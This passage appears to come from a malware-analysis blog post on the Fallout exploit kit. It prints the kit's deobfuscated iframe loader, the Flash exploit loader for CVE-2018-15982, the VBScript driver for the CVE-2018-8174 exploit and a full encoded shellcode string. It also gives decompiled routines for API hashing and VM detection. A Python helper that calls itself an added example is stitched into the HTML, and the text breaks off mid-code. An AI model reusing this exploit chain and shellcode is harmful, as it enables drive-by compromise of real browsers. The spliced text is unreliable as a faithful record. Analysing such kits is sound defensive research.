The decoded data consists of the CVE-2018-8174 exploit code and the loader code that reads the swf exploiting CVE-2018-15982.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span><span class="p">(</span><span class="nx">IlIII1lll</span><span class="p">[</span><span class="dl">'</span><span class="s1">length</span><span class="dl">'</span><span class="p">]</span> <span class="o">!==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">IIlIl</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">createElement</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">iframe</span><span class="dl">"</span><span class="p">);</span> <span class="nx">IIlIl</span><span class="p">[</span><span class="dl">'</span><span class="s1">setAttribute</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">id</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">IlIlll1I1</span><span class="dl">"</span><span class="p">);</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">getElementsByTagName</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">BODY</span><span class="dl">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">IIlIl</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">I11I11IIlIII</span> <span 
class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">getElementById</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">IlIlll1I1</span><span class="dl">"</span><span class="p">)[</span><span class="dl">'</span><span class="s1">contentWindow</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">];</span> <span class="nx">I11I11IIlIII</span><span class="p">[</span><span class="dl">'</span><span class="s1">open</span><span class="dl">'</span><span class="p">]();</span> <span class="nx">I11I11IIlIII</span><span class="p">[</span><span class="dl">'</span><span class="s1">write</span><span class="dl">'</span><span class="p">](</span><span class="nx">IlIII1lll</span><span class="p">);</span> <span class="nx">I11I11IIlIII</span><span class="p">[</span><span class="dl">'</span><span class="s1">close</span><span class="dl">'</span><span class="p">]();</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="nx">lIl1l1I</span><span class="p">[</span><span class="dl">'</span><span class="s1">length</span><span class="dl">'</span><span class="p">]</span> <span class="o">!==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">l1III11</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">createElement</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">iframe</span><span class="dl">"</span><span class="p">);</span> <span 
class="nx">l1III11</span><span class="p">[</span><span class="dl">'</span><span class="s1">setAttribute</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">id</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">lII1I1IlI1I</span><span class="dl">"</span><span class="p">);</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">getElementsByTagName</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">BODY</span><span class="dl">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">l1III11</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">llIll1lI</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">getElementById</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">lII1I1IlI1I</span><span class="dl">"</span><span class="p">)[</span><span class="dl">'</span><span class="s1">contentWindow</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">];</span> <span class="nx">llIll1lI</span><span class="p">[</span><span class="dl">'</span><span class="s1">open</span><span class="dl">'</span><span class="p">]();</span> <span class="nx">llIll1lI</span><span class="p">[</span><span class="dl">'</span><span class="s1">write</span><span class="dl">'</span><span class="p">](</span><span class="nx">lIl1l1I</span><span class="p">);</span> <span 
class="nx">llIll1lI</span><span class="p">[</span><span class="dl">'</span><span class="s1">close</span><span class="dl">'</span><span class="p">]();</span> <span class="p">}</span> </code></pre></div></div> <p>For the swf loader, the following code is executed.</p> <div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;meta</span> <span class="na">http-equiv=</span><span class="s">"x-ua-compatible"</span> <span class="na">content=</span><span class="s">"IE=10"</span><span class="nt">&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"BnjJbx"</span><span class="nt">&gt;&lt;object</span> <span class="na">classid=</span><span class="s">"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"</span> <span class="na">width=</span><span class="s">"205"</span> <span class="na">height=</span><span class="s">"528"</span> <span class="na">id=</span><span class="s">"BnjJbx"</span> <span class="na">align=</span><span class="s">"middle"</span><span class="nt">&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"movie"</span> <span class="na">value=</span><span class="s">"/24_02_1964/05_04_1933/3410-Skegger-12666"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"quality"</span> <span class="na">value=</span><span class="s">"high"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"bgcolor"</span> <span class="na">value=</span><span class="s">"#ffffff"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"play"</span> <span class="na">value=</span><span class="s">"true"</span> <span class="nt">/&gt;</span> <span 
class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"loop"</span> <span class="na">value=</span><span class="s">"true"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"wmode"</span> <span class="na">value=</span><span class="s">"window"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"scale"</span> <span class="na">value=</span><span class="s">"showall"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"menu"</span> <span class="na">value=</span><span class="s">"false"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"devicefont"</span> <span class="na">value=</span><span class="s">"false"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"salign"</span> <span class="na">value=</span><span class="s">""</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"allowScriptAccess"</span> <span class="na">value=</span><span class="s">"sameDomain"</span> <span class="nt">/&gt;&lt;/object&gt;&lt;/div&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre></div></div> <p>Thus, the swf file that exploits CVE-2018-15982 is read and executed.</p> <h2 id="cve-2018-8174">CVE-2018-8174</h2> <p>The exploit code used is very similar to the PoC.</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">Sub</span> <span class="nf">StartExploit</span> <span class="n">UAF</span> <span class="n">InitObjects</span> <span class="n">vb_adrr</span><span class="o">=</span><span class="n">LeakVBAddr</span><span class="p">()</span> <span class="n">vbs_base</span><span 
class="o">=</span><span class="n">GetBaseByDOSmodeSearch</span><span class="p">(</span><span class="n">GetUint32</span><span class="p">(</span><span class="n">vb_adrr</span><span class="p">))</span> <span class="n">msv_base</span><span class="o">=</span><span class="n">GetBaseFromImport</span><span class="p">(</span><span class="n">vbs_base</span><span class="p">,</span><span class="s">"msvcrt.dll"</span><span class="p">)</span> <span class="n">krb_base</span><span class="o">=</span><span class="n">GetBaseFromImport</span><span class="p">(</span><span class="n">msv_base</span><span class="p">,</span><span class="s">"kernelbase.dll"</span><span class="p">)</span> <span class="n">ntd_base</span><span class="o">=</span><span class="n">GetBaseFromImport</span><span class="p">(</span><span class="n">msv_base</span><span class="p">,</span><span class="s">"ntdll.dll"</span><span class="p">)</span> <span class="n">VirtualProtectAddr</span><span class="o">=</span><span class="n">GetProcAddr</span><span class="p">(</span><span class="n">krb_base</span><span class="p">,</span><span class="s">"VirtualProtect"</span><span class="p">)</span> <span class="n">NtContinueAddr</span><span class="o">=</span><span class="n">GetProcAddr</span><span class="p">(</span><span class="n">ntd_base</span><span class="p">,</span><span class="s">"NtContinue"</span><span class="p">)</span> <span class="n">SetMemValue</span> <span class="n">GetShellcode</span><span class="p">()</span> <span class="n">ShellcodeAddr</span><span class="o">=</span><span class="n">GetMemValue</span><span class="p">()</span><span class="o">+</span><span class="mi">8</span> <span class="n">SetMemValue</span> <span class="n">WrapShellcodeWithNtContinueContext</span><span class="p">(</span><span class="n">ShellcodeAddr</span><span class="p">)</span> <span class="n">lIlll</span><span class="o">=</span><span class="n">GetMemValue</span><span class="p">()</span><span class="o">+</span><span class="mi">69596</span> <span 
class="n">SetMemValue</span> <span class="n">ExpandWithVirtualProtect</span><span class="p">(</span><span class="n">lIlll</span><span class="p">)</span> <span class="n">llIIll</span><span class="o">=</span><span class="n">GetMemValue</span><span class="p">()</span> <span class="n">ExecuteShellcode</span> <span class="k">End</span> <span class="k">Sub</span> <span class="n">StartExploit</span> </code></pre></div></div> <p>The process to generate shellcode is like this.</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">Function</span> <span class="nf">GetShellcode</span><span class="p">()</span> <span class="n">IIlI</span><span class="o">=</span><span class="n">Unescape</span><span class="p">(</span><span class="s">"%u0000%u0000%u0000%u0000"</span><span class="p">)</span> <span class="o">&amp;</span><span class="n">Unescape</span><span class="p">(</span><span class="s">"%u8B55%u83EC%uF8E4%uEC81%u00CC%u0000%u5653%uE857%u08B0%u0000%uF08B%u44C7%u1824%u05CD%u5379%u848D%uB024%u0000%u8900%u2474%u8934%u2444%u8D14%u2454%u8D10%u2444%uC744%u2444%u1D1C%u2BDE%u8982%u2444%u8D10%u244C%u8D14%u2484%u0094%u0000%u4489%u2824%u448D%u1824%u8D50%u2444%u502C%u1EE8%u0006%u8B00%u245C%u8D18%u244C%u8B18%u247C%u8B1C%u8903%u2444%u8B40%u1C47%u4489%u4424%u478B%u8920%u2444%u3348%u89C0%u2444%u8918%u2444%u891C%u2444%uE834%u02E9%u0000%u548D%u1C24%uCF8B%u66E8%u0002%u8300%u2464%u0038%u4C8D%u2024%u406A%uE856%u02FE%u0000%uC683%u8D40%u244C%u6828%u0080%u0000%uE856%u02EC%u0000%u74FF%u2C24%u4C8B%u5024%u448D%u4824%u74FF%u2C24%uD68B%u74FF%u4824%u5753%u8D50%u2444%u5060%u448D%u4C24%uE850%u0389%u0000%uDB33%uC483%u3938%u245C%u742C%u8B41%u2474%u8D38%u2444%u6A48%u5F44%u5357%uFF50%u83D6%u0CC4%u7C89%u4824%u448D%u1824%u106A%u5053%uD6FF%uC483%u8D0C%u2444%u5018%u448D%u4C24%u5350%u6853%u0000%u0800%u5353%uFF53%u2474%u5350%u54FF%u6424%uFF53%u2454%u5F44%u5B5E%uE58B%uC35D%u8B55%u83EC%u0CEC%u458B%u890C%uF445%u458B%u8908%uF845%u6583%u00FC%u07EB%u458B%u40FC%u4589%u8B
FC%uFC45%u453B%u7310%u8B12%uF845%u4503%u8BFC%uF44D%u4D03%u8AFC%u8809%uEB08%uC9DF%u55C3%uEC8B%u458B%u0F08%u00BE%uC085%u2D74%u458B%u0F08%u00BE%uF883%u7C41%u8B19%u0845%uBE0F%u8300%u5AF8%u0E7F%u458B%u0F08%u00BE%uC083%u8B20%u084D%u0188%u458B%u4008%u4589%uEB08%u5DC9%u55C3%uEC8B%u8B51%u0845%u4589%uEBFC%u8B07%uFC45%u8940%uFC45%u458B%u0FFC%u00BE%uC085%u0274%uEDEB%u458B%u2BFC%u0845%uC3C9%u5653%u8B57%u33D9%u53FF%u3347%uE8F6%uFFC9%uFFFF%u8B59%u85C8%u74C9%u0F24%u03B6%uD233%uC703%uF1BF%u00FF%uF700%u43F7%uFA8B%uD233%u048D%uBE3E%uFFF1%u0000%uF6F7%uF28B%uE983%u7501%uC1DC%u10E6%u048D%u5F37%u5B5E%u55C3%uEC8B%uEC83%u5310%u5756%uF98B%u5589%u33FC%u8BF6%u3C47%u5C8B%u7838%uDF03%u438B%u8B1C%u204B%uC703%u4589%u03F0%u8BCF%u2443%uC703%u4D89%u89F8%uF445%u7339%u7618%u8B18%uB10C%uCF03%u7BE8%uFFFF%u3BFF%uFC45%u1074%u4D8B%u46F8%u733B%u7218%u33E8%u5FC0%u5B5E%uC3C9%u458B%u8BF4%uF04D%uB70F%u7004%u048B%u0381%uEBC7%u64EA%u30A1%u0000%u8B00%u0C40%u408B%u8B14%u8B00%u8B00%u1040%u64C3%u30A1%u0000%u8B00%u0C40%u408B%u8B14%u8B00%u1040%u56C3%u8B57%u8BF9%u56F2%u078B%uD0FF%uC085%u0675%u478B%u5604%uD0FF%u5E5F%u56C3%uF18B%uE856%uFEAB%uFFFF%u8B59%uE8CE%uFF06%uFFFF%u3D5E%u06DE%u3F54%u1F74%u413D%uCD05%u7425%u3D18%u0309%u0F05%u1174%uEC3D%u1803%u7416%u3D0A%u044B%u19F3%u0374%uC033%u33C3%u40C0%u55C3%uEC8B%uEC81%u013C%u0000%u418B%u5308%u5756%uFA8B%uDB33%u518B%u890C%uF855%u518B%u8B10%u1449%u6A53%u8902%uFC55%u4D89%uFFF4%u8BD0%u83F0%uFFFE%u4074%u858D%uFEC8%uFFFF%u85C7%uFEC8%uFFFF%u0128%u0000%u5650%u55FF%u85F8%u74C0%u8D27%uEC8D%uFFFE%uE8FF%uFF6F%uFFFF%uC085%u1575%u858D%uFEC8%uFFFF%u5650%u55FF%u85FC%u75C0%u56E2%u55FF%uEBF4%u3303%u43DB%u1F89%u5E5F%uC95B%u55C3%uEC8B%uEC83%u5310%u5756%uC033%uF98B%u3340%u53C9%uA20F%uF38B%u8D5B%uF05D%u0389%u7389%u8904%u084B%u5389%u8B0C%uF845%uE8C1%u891F%u5F07%u5B5E%uC3C9%u8B55%u81EC%u04EC%u0001%u5300%u3356%u57F6%uC68B%u8488%uFC05%uFFFE%u40FF%u003D%u0001%u7200%u8BF1%u8BDE%u8BFE%u8AF1%u3D94%uFEFC%uFFFF%uC78B%uE083%u0F07%uCAB6%uB60F%u3004%uC303%uC803%uB60F%u8AD9%u1D84%uFEFC%uFFFF%u8488%uFC3D%uFFFE%u47FF
%u9488%uFC1D%uFFFE%u81FF%u00FF%u0001%u7200%u8BC8%u0C7D%uF633%uDE8B%uFF85%u5574%u458B%u8908%u0C45%u438D%u0F01%uD8B6%u948A%uFC1D%uFFFE%u0FFF%uC2B6%uC603%uB60F%u8AF0%u3584%uFEFC%uFFFF%u8488%uFC1D%uFFFE%u88FF%u3594%uFEFC%uFFFF%uB60F%u1D8C%uFEFC%uFFFF%uB60F%u03C2%u8BC8%u0C45%uB60F%u8AC9%u0D8C%uFEFC%uFFFF%u0830%u8940%u0C45%uEF83%u7501%u8BB1%u0845%u5E5F%uC95B%u55C3%uEC8B%uEC83%u8B48%u1C45%u4D89%u53F4%u8B56%u8B08%u0870%u4D89%u8BF8%u0448%u4D89%u8BF0%u0C48%u4D89%u8BE8%u1048%u4D89%u8BE0%u1448%u4D89%u8BD8%u1848%u458B%u5714%u046A%u5589%u8BEC%u1850%u4D89%u8BC8%u2448%u458B%u6818%u1000%u0000%u046A%u006A%u388B%u5589%u89D4%uFC4D%u7D89%uFFD0%u6AD2%u8B04%u6AD8%u5300%u5D89%uFFE4%u83D7%u207D%u8D00%u1445%u046A%u5350%u1875%u7D83%u0024%u0975%u45C7%uC614%u90EA%uEB2A%uC71D%u1445%uF9D7%u2A90%u14EB%u7D83%u0024%u45C7%uD214%u90EB%u752A%uC707%u1445%uE4D2%u2A90%u29E8%uFFFC%u8BFF%u084D%u458D%u83C0%u0CC4%u45C7%uF4C0%uDBBC%uC770%uC445%uE14D%u1989%u086A%uE850%uFE76%uFFFF%u5959%uDB33%u458D%u53C0%u5353%u5053%u55FF%u8BF8%u85F8%u75FF%u8B0A%u1045%u1889%u23E9%u0001%u5300%u6A53%u5303%u6853%u01BB%u0000%u75FF%u57F4%u55FF%u8BF0%u89D8%u145D%uDB85%u840F%u00FB%u0000%u4D8B%u8D08%uB845%u086A%uC750%uB845%uC6E5%u1DB0%u45C7%u7CBC%uB9D1%uE819%uFE1C%uFFFF%u5959%uC033%u6850%u3000%u8080%u5050%uFF50%uEC75%u458D%u50B8%uFF53%uE855%uD88B%uDB85%u840F%u00B8%u0000%u046A%u75FF%u6AE4%u6A00%u5300%u55FF%u85E0%u0FC0%uA084%u0000%u8300%u1C65%u8D00%uDC45%u6583%u00DC%u8D50%u1845%u45C7%u0418%u0000%u5000%u458D%u501C%u0568%u0000%u5320%u55FF%u83D8%u187D%u7400%u8376%u1C7D%u7400%u6A70%u6804%u1000%u0000%u75FF%u6A1C%uFF00%uD455%u75FF%u8B1C%u0C4D%u006A%u8950%uFF01%uD055%u6583%u00CC%u458D%u50CC%u458B%uFF0C%u1C75%u30FF%uFF53%uC855%uFF53%uFFD6%u1475%uD6FF%uFF57%u83D6%u207D%u8B00%uFC75%u0474%u006A%uD6FF%u7D83%u0024%u0474%u006A%uD6FF%u458B%uFF0C%u1C75%u4D8B%uFF08%uE830%uFD52%uFFFF%u458B%u5910%uC759%u0100%u0000%uEB00%u5311%uD6FF%u75FF%uFF14%u57D6%uD6FF%u458B%u8310%u0020%u5E5F%uC95B%u55C3%uEC8B%uEC83%u5310%u8B56%u8BF1%u57DA%u7589%uE8FC%uFBF7%uFFFF%uF88B%u
43BA%u1C04%u8B19%uE8CF%uFB83%uFFFF%u368B%u75BA%uB905%u8B28%u89CF%u1446%u72E8%uFFFB%u8BFF%uFC75%u51BA%u3209%u8B73%u890E%u1C41%uCF8B%u5EE8%uFFFB%u8BFF%uBA0E%u0614%u33F5%u4189%u8B08%uE8CF%uFB4D%uFFFF%u0E8B%u97BA%u8104%u891D%u8B01%uE8CF%uFB3D%uFFFF%u0E8B%u4DBA%u8505%u8927%u0441%uCF8B%u2CE8%uFFFB%u8BFF%uBA0E%u04E4%u2259%u4189%u8B0C%uE8CF%uFB1B%uFFFF%u0E8B%uD3BA%u7004%u891F%u1041%uCF8B%u0AE8%uFFFB%u8BFF%uBA0E%u047A%u1A1E%u4189%u8B18%uE8CF%uFAF9%uFFFF%u0E8B%uF3BA%u8503%u8915%u2041%uCF8B%uE8E8%uFFFA%u8BFF%u890E%u2441%u58E8%uFFFB%uBAFF%u028C%u08D8%uC88B%uD2E8%uFFFA%u8BFF%u6A0B%u890C%u8D01%uF045%u4D8B%u500C%u45C7%uC2F0%u8DE0%uC720%uF445%uB412%u37CD%u45C7%uEFF8%uF16B%uE8A4%uFC34%uFFFF%u5959%u0E8B%u558D%uE8F0%uFB2B%uFFFF%uF88B%u5DBA%u1006%u8B36%uE8CF%uFA91%uFFFF%u758B%uBA08%u0584%u29FB%u0E8B%u4189%u8B0C%uE8CF%uFA7D%uFFFF%u0E8B%u55BA%uC706%u8935%u1441%uCF8B%u6CE8%uFFFA%u8BFF%uBA0E%u078C%u4B92%u4189%u8B10%uE8CF%uFA5B%uFFFF%u0E8B%u55BA%u6406%u8936%u0841%uCF8B%u4AE8%uFFFA%u8BFF%uBA0E%u051D%u245C%u4189%u8B04%uE8CF%uFA39%uFFFF%u0E8B%u46BA%uC006%u8935%u8B01%uE8CF%uFA29%uFFFF%u0E8B%u5E5F%u895B%u1841%uC3C9%uECD7%u2182%uA319%u2DD6%u29FE%uCBFE%u5CE9%uB27D%u501A%uCF26%u6A47%u54FE%uDABA%u8A85%uEF83%u3361%u09D1%u20F7%u16EC%uD9B7%u917A%uDE1A%u2281%uEA7F%u3143%u6ACE%u1A52%u4FF4%u500B%uC276%u5A57%uC1F8%uE09A%u258F%uA209%u6BCD%u28EE%uE3E7%u2FD5%u8D28%u3568%uAE4A%u0623%u309B%u8E87%uE4E0%u8EF7%u5F02%u7AB4%u73DA%u7483%uB0D2%uBC0E%uB049%u40EE%u8610%u7665%u07AF%u7330%u3C80%u6436%uF745%u5A61%uC1F8%uBBE2%u5581%uF71D%u00A7%u7F8D%u4907%u11AF%uB565%uF4E6%u755E%u19EE%u23AF%u8DB6%uEB89%u2838%u11BF%uC109%u1219%uD17E%uBEEA%uDD49%uF759%u09D6%uEA08%u8E45%uB602%u1B93%u19C4%u9146%uB94D%u9E6C%u0BC7%u00E8%u0000%u5800%uE883%u2D05%u00C0%u0000%u00C3"</span> <span class="o">&amp;</span><span class="n">lIIII</span><span class="p">(</span><span class="n">IIIII</span><span class="p">(</span><span class="s">""</span><span class="p">)))</span> <span class="n">IIlI</span><span class="o">=</span><span class="n">IIlI</span> 
<span class="o">&amp;</span> <span class="kt">String</span><span class="p">((</span><span class="o">&amp;</span><span class="n">h80000</span><span class="o">-</span><span class="n">LenB</span><span class="p">(</span><span class="n">IIlI</span><span class="p">))</span><span class="o">/</span><span class="mi">2</span><span class="p">,</span><span class="n">Unescape</span><span class="p">(</span><span class="s">"%u4141"</span><span class="p">))</span> <span class="n">GetShellcode</span><span class="o">=</span><span class="n">IIlI</span> <span class="k">End</span> <span class="k">Function</span> </code></pre></div></div> <p>Let’s read the shellcode.</p> <h2 id="shellcode">Shellcode</h2> <p>The decoding algorithm in the shellcode has not changed from v3 and remains RC4 (see <a href="https://nao-sec.org/2019/03/analysis-of-fallout-exploit-kit-v3.html">Analysis of Fallout Exploit Kit v3</a>).</p> <p>The API hashing algorithm has not changed either: API names are hashed with the dualaccModFFF1Hash routine.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">__thiscall</span> <span class="nf">dualaccModFFF1Hash</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kr">__int8</span> <span class="o">*</span><span class="n">this</span><span class="p">)</span> <span class="p">{</span> <span class="kt">unsigned</span> <span class="kr">__int8</span> <span class="o">*</span><span class="n">v1</span><span class="p">;</span> <span class="c1">// ebx</span> <span class="kt">int</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// edi</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// esi</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// ecx</span> <span class="kt">unsigned</span> <span 
class="kt">int</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// edx</span> <span class="n">v1</span> <span class="o">=</span> <span class="n">this</span><span class="p">;</span> <span class="n">v2</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">v3</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="n">zz_count</span><span class="p">(</span><span class="n">this</span><span class="p">);</span> <span class="n">i</span><span class="p">;</span> <span class="o">--</span><span class="n">i</span> <span class="p">)</span> <span class="p">{</span> <span class="n">v5</span> <span class="o">=</span> <span class="p">(</span><span class="n">v2</span> <span class="o">+</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="o">*</span><span class="n">v1</span><span class="o">++</span><span class="p">)</span> <span class="o">%</span> <span class="mh">0xFFF1</span><span class="p">;</span> <span class="n">v2</span> <span class="o">=</span> <span class="n">v5</span><span class="p">;</span> <span class="n">v3</span> <span class="o">=</span> <span class="p">(</span><span class="n">v3</span> <span class="o">+</span> <span class="n">v5</span><span class="p">)</span> <span class="o">%</span> <span class="mh">0xFFF1</span><span class="p">;</span> <span class="p">}</span> <span class="k">return</span> <span class="n">v2</span> <span class="o">+</span> <span class="p">(</span><span class="n">v3</span> <span class="o">&lt;&lt;</span> <span class="mi">16</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <p>However, there were interesting changes. 
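<p>Before turning to those changes, the hash routine above is worth pinning down: two accumulators updated modulo 0xFFF1 (65521) and combined as v2 + (v3 &lt;&lt; 16) is exactly the Adler-32 checksum. The following Python, an added example that is not code from this post or from the exploit kit, ports the routine and builds a reverse lookup so that hash constants found in the shellcode can be turned back into API names. The candidate export list is constructed for illustration only; the <code>lowercase</code> option mirrors the zz_tolowercase step described below on the assumption that process names are compared with the same routine, which the post does not state.</p>

```python
import zlib

MODULUS = 0xFFF1  # 65521, the largest prime below 2**16 (the Adler-32 modulus)


def dualacc_mod_fff1_hash(name: bytes) -> int:
    """Byte-for-byte port of the decompiled dualaccModFFF1Hash.

    v2 starts at 1 and v3 at 0; each byte is added to v2 and v2 to v3, both
    modulo 0xFFF1; the result is v2 + (v3 << 16). This is Adler-32.
    """
    v2, v3 = 1, 0
    for byte in name:
        v2 = (v2 + byte) % MODULUS
        v3 = (v3 + v2) % MODULUS
    return v2 + (v3 << 16)


def matches_adler32(name: bytes) -> bool:
    """Self-check of the port against zlib's Adler-32 implementation."""
    return dualacc_mod_fff1_hash(name) == zlib.adler32(name)


def build_hash_table(candidates, lowercase=False):
    """Map hash value -> candidate name.

    lowercase=True hashes the lower-cased form, as the shellcode does to
    process names via zz_tolowercase (assumption: same hash routine).
    """
    table = {}
    for name in candidates:
        key = name.lower() if lowercase else name
        table[dualacc_mod_fff1_hash(key.encode("ascii"))] = name
    return table


# Constructed candidate list for illustration; in practice it would be the
# export tables of the DLLs the shellcode walks (kernel32, ntdll, ...).
API_CANDIDATES = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "CreateToolhelp32Snapshot", "Process32First", "Process32Next",
    "CloseHandle", "ExitProcess",
]


def resolve_hash(hash_value: int, candidates=API_CANDIDATES, lowercase=False):
    """Return the candidate whose hash equals hash_value, or None."""
    return build_hash_table(candidates, lowercase).get(hash_value)


if __name__ == "__main__":
    # The table an analyst compares against the constants in the shellcode.
    for api in API_CANDIDATES:
        print(f"{dualacc_mod_fff1_hash(api.encode()):08x}  {api}")
```

<p>Because the routine is Adler-32, <code>zlib.adler32</code> (or any Adler-32 implementation) can be used directly to hash a full export list; the port is kept here so the mapping to v2 and v3 in the decompiled code stays visible.</p>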
Analysis-environment detection code has been added to the shellcode.</p> <h3 id="vm-detection">VM Detection</h3> <p>The shellcode queries for hypervisor presence with CPUID: it executes leaf 1 and tests bit 31 of ECX, the hypervisor-present bit that hypervisors expose to their guests. The result is stored through the pointer argument and also returned. On bare metal this bit is clear; most sandboxes and VMs set it unless the hypervisor has been configured to hide it.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">__thiscall</span> <span class="nf">zz_vm_detect</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span> <span class="o">*</span><span class="n">this</span><span class="p">)</span> <span class="p">{</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="o">*</span><span class="n">v1</span><span class="p">;</span> <span class="c1">// edi</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">result</span><span class="p">;</span> <span class="c1">// eax</span> <span class="n">v1</span> <span class="o">=</span> <span class="n">this</span><span class="p">;</span> <span class="n">_EAX</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="kr">__asm</span> <span class="p">{</span> <span class="n">cpuid</span> <span class="p">}</span> <span class="n">result</span> <span class="o">=</span> <span class="n">_ECX</span> <span class="o">&gt;&gt;</span> <span class="mi">31</span><span class="p">;</span> <span class="o">*</span><span class="n">v1</span> <span class="o">=</span> <span class="n">_ECX</span> <span class="o">&gt;&gt;</span> <span class="mi">31</span><span class="p">;</span> <span class="k">return</span> <span class="n">result</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <h3 id="process-detection">Process Detection</h3> <p>The shellcode enumerates the running processes.</p> <p><img src="https://nao-sec.org/assets/2019-07-09/03.jpg" alt="" /></p> <p>Each process name is converted to lower case before hashing; only ASCII 'A'..'Z' are shifted, as the routine below shows.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span
class="kt">int</span> <span class="kr">__cdecl</span> <span class="nf">zz_tolowercase</span><span class="p">(</span><span class="n">_BYTE</span> <span class="o">*</span><span class="n">a1</span><span class="p">)</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">result</span><span class="p">;</span> <span class="c1">// eax</span> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> <span class="p">{</span> <span class="n">result</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="p">)</span><span class="o">*</span><span class="n">a1</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!*</span><span class="n">a1</span> <span class="p">)</span> <span class="k">break</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">char</span><span class="p">)</span><span class="o">*</span><span class="n">a1</span> <span class="o">&gt;=</span> <span class="mi">65</span> <span class="o">&amp;&amp;</span> <span 